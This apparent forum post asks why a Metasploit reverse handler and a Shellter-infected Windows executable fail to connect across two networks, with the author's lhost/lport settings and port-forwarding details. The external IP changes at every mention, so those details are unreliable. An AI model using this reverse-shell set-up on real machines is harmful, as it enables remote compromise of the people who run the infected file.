I am having some issues that I can't seem to solve.
2 Laptops - One running Kali though bootable USB. The other Windows 8.1
2 Networks. I have Kali running on my home network and Windows 8.1 running on my Mobile hotspot.
I have tried Metasploit and Armitage with the same issue.
Example external IP: 18.104.22.168
Private Local IP of Kali: 192.168.0.72
Home network has 6996 port forwarded for Kali
set lhost 22.214.171.124
set lport 6996
..... other commands.
Exploit running as background job. Started reverse handler on 192.168.0.72:6996 (This is one of my issues. I set the lhost to the external, not internal)
So I do jobs -K
re-type set lhost 126.96.36.199
Handler failed to find to 188.8.131.52:6996
started reverse handler on 0.0.0.0:6996
starting the payload handler...
(This is what I normally get when I do this and it worked just fine in the past.)
Issue number 2 is: Go to my Windows 8.1 laptop. Run Shellter to create an infected executable. Set lhost 184.108.40.206 set lport 6996.
After it's created and I run it, it will not connect.
If I create a file with shellter with the lhost as the local IP 192.168.0.72 and set metasploit to listen on that and put both laptops on the same network it works just fine.
I have tried it will Metasploit not updated and with it updated. I have tried different versions of Shellter with the same result. I believe issue one is causing issue 2.